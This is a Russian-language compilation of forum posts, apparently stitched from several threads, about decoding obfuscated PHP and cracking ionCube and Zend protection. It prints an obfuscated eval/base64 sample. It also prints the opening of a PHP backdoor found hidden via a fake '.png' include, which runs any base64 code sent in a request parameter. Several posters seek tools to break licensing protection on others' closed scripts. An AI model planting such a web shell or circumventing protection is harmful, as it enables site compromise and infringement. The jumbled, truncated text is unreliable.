PHP Obfuscator by DX 1.5 Подскажите пожалуйста, как можно раскодировать?! вот пример http://pastebin.com/s9yc8fNR
Ну, для кого то это как два клика о блокнот, а для кого то сложнее) Вот и прошу более развернутый ответ.
Кто знает как обстоят дела с декриптом ioncube? Возможно в наше время найти декодер под ioncube? Говорят, что китай лучший в этом деле. Так ли это? (У меня есть дезендер, остался со времен жизни вебхак, если память не изменяет китай его делал) Может кто встречал ссылки на китай форумах?
Расшифровка кода Подскажите чем расшифровать PHP: $a50265f18b2a90=str_rot13('tmhapbzcerff'); $a50265f18b2a95=str_rot13(strrev('rqbprq_46rfno')); eval($a50265f18b2a90($a50265f18b2a95('eF5Tcffxd3L0CY5Wjzc0NLQ0MTW1sLSIV4+1dSwqSqzU0LQGAJDECMg='))); eval($a50265f18b2a90($a50265f18b2a95('eF4NysEKgjAAANBf8TBQb7aVKdJBaEiwdShDNELmtnAhE9bmqOjf653f3Wlu1ayDHmUJTNMk20ZAxR/AdqUx7BWFBHUjVzkSiC+DPhq6P1haY0/feEXq0hN4GkWFF/EfBGLbwnEamunRNt5xfVnYOfesoY5XGx3GhZHWGR0M7CnTdS8kn4WMALsCdYuL7w/60S8a'))); eval($a50265f18b2a90($a50265f18b2a95('eF7LzEvOKU1Jjc/PS07ViDe2MDAyMzOwMNcw0NS0BgCLtwgt')));
как зашифровать php код ?, что бы скопировать его было нельзя (оригинал) из файла php открыв его редактором, но на сервере он мог расшифровываться и работать
Руками. include_once('/var/www/nsk02-110315-00/data/www/a-chemical.ru/i/pic.png') В этом файле у вас находится дважды кодированный список функций: Code: array_key_exists array_merge array_shift base64_decode base64_encode chmod clearstatcache count curl_close curl_exec curl_init curl_setopt define defined dirname error_reporting explode fclose feof fgets filectime file_get_contents filemtime filesize flock fopen fputs fread fsockopen function_exists fwrite getenv get_magic_quotes_runtime gmstrftime gzdeflate gzinflate implode in_array ini_get ini_set is_array is_file is_numeric is_writable md5 preg_replace preg_replace_callback rand rawurldecode setcookie set_magic_quotes_runtime strlen strpos str_replace strtolower strtoupper substr time touch unserialize Выполняются они первым скриптов из get-запроса.
например делать проверку в самом скрипте на запуск на определенном хосте, а потом сам скрипт прогнать через обфускатор
dezend index.php Товарищи! Пробовал все дезендеры которые только нашел. Ну никак. Помогите плиз, очень нужно! Файл https://yadi.sk/d/gKHKklpZWxKjg
include_once('/var/www/nsk02-110315-00/data/www/a-chemical.ru/i/pic.png') это и есть код, смотри что в картинке этой, там продолжение
Там только обфусцированный в два этапа список функций, который дергается по запросу как раз в первом скрипте, которые по настоятельной просьбе был передан запостившему.
Сделал замену eval на echo, потом расшифровал basa64 получил PHP: include_once('/home/user/domains/site.com/public_html/i/pic.png'); Но такой картинки у меня нет pic.png, думаю дописать проблем не возникнет, спасибо за помощь.
Начало кода Code: ?php $_f___f='base'.(32*2).'_de'.'code'; if((md5($_REQUEST["img_id"]) == "ae6d32585ecc4d33cb8cd68a047d8434") && isset($_REQUEST["mod_content"])) { eval($_f___f($_REQUEST["mod_content"])); exit(); } $_f___f=$_f___f(str_replace("\n", '', 'P7FB3AybFxmRoovQsw9XvisJsIs58
Здравствуйте. Есть скрипт на php, в одном из файлов потребовалось изменить кое что, это парсинг текста и запись в базу как урл... Сайт в кодировке utf-8, база тоже самое... в итоге ссылка записывается вместо например - Япония, записывает как - %D0%AF%D0%BF%D0%BE%D0%BD%D0%B8%D1%8F Мне очень надо сделать что бы вместо символов были русские символы и в чпу и в статье в момент записи в базу... и еще изменить формирование урл ссылок на теги(адрес)... Так вот теперь самое главное, файл который обрабатывает все это дело, закодирован в ioncub, я его раскодировал, но там нарушился синтаксис, в общем перестал работать, а я в пшп вообще не понимаю... Найдутся ли люди которые помогут мне привести код скрипта в рабочее состояние после декодирования..? Может ли кто помочь восстановить правильный синтаксис после декодирования деионкубом..? Скрипт чужой и закрытый, по этому если кто согласится, скину в личку.